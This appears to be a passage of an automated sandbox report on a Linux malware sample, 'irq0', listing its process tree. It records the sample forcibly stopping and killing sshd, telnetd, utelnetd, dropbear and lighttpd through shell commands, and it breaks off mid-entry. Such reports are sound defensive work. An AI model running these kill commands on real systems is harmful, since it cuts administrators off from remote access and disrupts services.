    Analysis Process: systemctl PID: 6603 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6607 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6607 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6657 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6657 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6662 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6662 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6748 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6748 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6776 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6776 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6811 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6811 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6825 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6825 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6849 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6849 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6891 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6891 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6908 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6908 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6930 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6930 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6973 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6973 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6980 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6980 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7011 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7011 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7077 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7077 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7123 Parent PID: 5763

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7123 Parent PID: 5763

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 5763 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop telnetd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq0 PID: 5766 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5766 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service sshd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5795 Parent PID: 5766

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 5795 Parent PID: 5766

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service sshd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 5811 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5811 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5856 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5856 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5860 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 5860 Parent PID: 5795

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6013 Parent PID: 5795

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 6016 Parent PID: 6013

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6016 Parent PID: 6013

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6017 Parent PID: 6013

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 6017 Parent PID: 6013

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 6375 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6375 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6450 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6450 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6477 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6477 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6504 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6504 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6511 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6511 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6549 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6549 Parent PID: 5795

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6577 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6577 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6604 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6604 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6612 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6612 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6658 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6658 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6661 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6661 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6749 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6749 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6775 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6775 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6788 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6788 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6820 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6820 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6847 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6847 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6851 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6851 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6897 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6897 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6928 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6928 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6955 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6955 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6974 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6974 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7009 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7009 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7057 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7057 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7082 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7082 Parent PID: 5795

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 5795 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop sshd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq0 PID: 5798 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5798 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 telnetd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5838 Parent PID: 5798

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5838 Parent PID: 3310

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 telnetd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5844 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5844 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5857 Parent PID: 5844

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5857 Parent PID: 5844

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 utelnetd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5858 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5858 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 dropbear > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5865 Parent PID: 5858

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5865 Parent PID: 5858

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 dropbear
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5872 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5872 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 sshd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5921 Parent PID: 5872

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5921 Parent PID: 3310

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 sshd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5923 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5923 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5966 Parent PID: 5923

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5966 Parent PID: 5923

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 lighttpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 8391 Parent PID: 5545

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 8393 Parent PID: 8391

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 8393 Parent PID: 8391

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:/bin/sh
